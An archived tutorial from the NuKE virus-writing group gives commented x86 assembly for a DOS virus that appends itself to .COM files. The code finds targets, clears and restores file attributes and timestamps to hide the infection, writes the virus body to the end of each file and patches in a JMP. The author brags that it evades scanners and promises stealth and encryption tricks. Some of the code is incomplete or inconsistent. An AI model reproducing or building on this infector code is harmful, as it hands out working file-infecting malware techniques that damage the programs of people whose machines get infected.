💾 Archived View for spam.works › mirrors › textfiles › virus › rstut003.txt captured on 2023-11-04 at 16:02:58.

View Raw

More Information

⬅️ Previous capture (2023-06-16)

-=-=-=-=-=-=-

                   ******************************************
                   **  Constructing Kit on infecting .COM  **
                   **                                      **
                   **          By Rock Steady/NuKE         **
                   ******************************************


     Well I must state my opinion that there are certainly WAY too many
 Overwriting Viruses out here. To help put a Stop to this I will try
 to explain to you a SIMPLE way to infect COM files at the END of the
 Program. This routine WORKS if you follow my steps correctly, and
 I've already used this in my `ParaSite ][' Virus.

 Anyhow this is a brief description what the ASM Source will do.
             1. Find a .COM file in the current Directory
             2. Save the Date and File's Attribute.
             3. Save the First 3 Bytes in a Stack
             4. Infect the File & restore new 3 bytes..
             5. Put the OLD date and File Attributes back on

                          Beginning...
                         ~~~~~~~~~~~~
 ;----------------------------------------------------------------------
 ; The Simple routine to Search for a .COM File...
 ;----------------------------------------------------------------------
 com_files       db      "*.com",0

         mov     ah,4eh          ;point to a *.COM file...
         mov     dx,com_files
         mov     cx,3            ;Attributes with ReadOnly or Hidden
         int     21h             ;is A okay...

         cmp     ax,12h          ;Any files found?
         je      exit            ;If no Files found Exit...
         jmp     found_file
 ; Instead of Exiting here you can make the Virus go and change dir and
 ; look for several other .com files else where... with the help of the
 ; path or simply searching for more <dir>...

 found_file:
         mov     di,[si+file] ;di points to the filename
         push    si
         add     si,file          ;si points to filename...

         mov     ax,offset 4300h  ;get file Attributes...
         mov     dx,si            ;filename in dx..
         int     21h

         mov     file_attrib,cx   ;Save file Attributes.

 file    dw      0
 ; Here we'll set the file attributes to nothing

         mov     ax,offset 4301h    ;To set file Attributes...
         mov     cx,offset 0fffeh   ;Set them to a Normal File
         mov     dx,si              ;filename...
         int     21h

         mov     ax,offset 3d02h    ;Open File to Read/Write.
         mov     dx,si              ;ASCIIZ filename
         int     21h

         jnb     ok                 ;If file was open continue
         jmp     put_old_attrib     ; error happened restore old attribs
                                    ; and quit.
 ok:
         mov     bx,ax
         mov     ax,offset 5700h    ;Get File Date & Time...
         int     21h

         mov     old_time,cx        ;Save old File Time...
         mov     old_date,dx        ;Save old File Date

 old_time        db      0
 old_date        db      0

 ; here we infect the file... but first we SAVE the first 3 bytes
 ; somewhere in our virus

         mov     ah,3fh          ;Read file...
         mov     cx,3            ;Number of bytes to read
         mov     dx,first_3      ;Save bytes in the buffer
         add     dx,si           ;Filename...
         int     21h

         cmp     ax,3            ;Where 3 bytes read?
         jnz     fix_file        ;If not fix file like before and quit

 first_3     equ     $    ; The First three bytes of the Original File!
             int     20h  ; the virus is infected to.
             nop

 ; This moves the File pointer to the END of the file

         mov     ax,offset 4202h
         mov     cx,0
         mov     dx,0
         int     21h
         mov     cx,ax          ;DX:AX is the FILESIZE!
         sub     ax,3           ;subtract three because of file pointer

         add     cx,offset c_len_y
         mov     di,si
         sub     di,offset c_len_x
         mov     [di],cx        ;Modifies the 2nd & 3rd bytes of program

 ; The writes our virus to the file

         mov     ah,40h
         mov     cx,virlength      ;Virus Length
         mov     dx,si             ;File...
         sub     dx,offset codelength  ;Length of virus codes.
         int     21h

         cmp     ax,offset virlength   ;all bytes written?
         jnz     fix_file              ;If no fix file and quit

 ;Moves the file pointer to the beginning of file and write the
 ;3 bytes JMP at the beginning of the file

         mov     ax,offset 4200h
         mov     cx,0
         mov     dx,0
         int     21h
                                                          
         mov     ah,40h       ;Write to file...
         mov     cx,3         ;# of bytes to write...
         mov     dx,si        ;File name...
         add     dx,jump      ;Point to the new JMP statement
         int     21h

 jump    db      0e9h    ;This is the JMP that will be put in the
                         ;Begining of the file!

 ;Restore Old File Time & Date

 fix_file:
         mov     dx,old_date     ;Old File Date
         mov     cx,old_time     ;Old file Time...
         and     cx,offset 0ffe0h ;Flat Attribs.
         mov     ax,offset 5701h
         int     21h

         mov     ah,3eh
         int     21h             ;Close file...


 ; Here we'll restore the old file attributes...

 put_old_attrib:
         mov     ax,offset 4301h
         mov     cx,old_att      ;old File Attributes.
         mov     dx,si           ;Filename...
         int     21h

 ;----------------------------- EnD -------------------------------------

 Anyhow that's it... Simple no? This source was also used in my ParaSite ][
 Virus that is STILL undetectable to date with Scanv85. Anyhow I even made
 it MORE simpler than my real sources that have to play with the file paths.

 Anyhow theres still work to be done, like you must restore the old data file
 so it will jump to 100h and run the old file the virus was infected too!
 Remember to store them in the beginning and then restore them! Anyhow there's
 a few Variables to be put in like `VirLength' which you should know how to
 do that also the `CodeLength' that is the VIRUS codes ONLY not counting the
 Stacks.

 Anyhow This works FINE with a Non-Resident Virus. Because a few statements
 would have to be edited for TSRs. Anyhow try to use this, it's small neat
 and fast.

 Anyhow Perhaps next issue I will develop a SIMPLE Ram-Resident virus that
 infects COMs and EXEs to be released into the next issue! Though I just
 release this sources for you to LEARN! Rather than putting you name on my
 virus and releasing another strain on work I worked Hard upon! Anyhow I
 should release a SIMPLE new Virus source for all you programmers out there!
 And I will even explain a few Stealth Technics like how to hide your program
 in memory right under the TOM.

 If there's Any Questions you want to know, please ask them I will answer
 them in the next [NukE] Releases... I may even release source codes on how
 to make an Algorithm Encryption method! I've developed one on my own,
 without the V2PX viruses sources... Anyhow it does the job and the formula
 I developed has an UNLIMITED amount of encryption methods! But since the
 virus codes have to be SMALL Like close to 2,000 bytes I will limit the
 formula to about 1,000 different combinations!

                            Rock Steady
                 NukE / Viral Development Reaseacher
                              -PeAcE-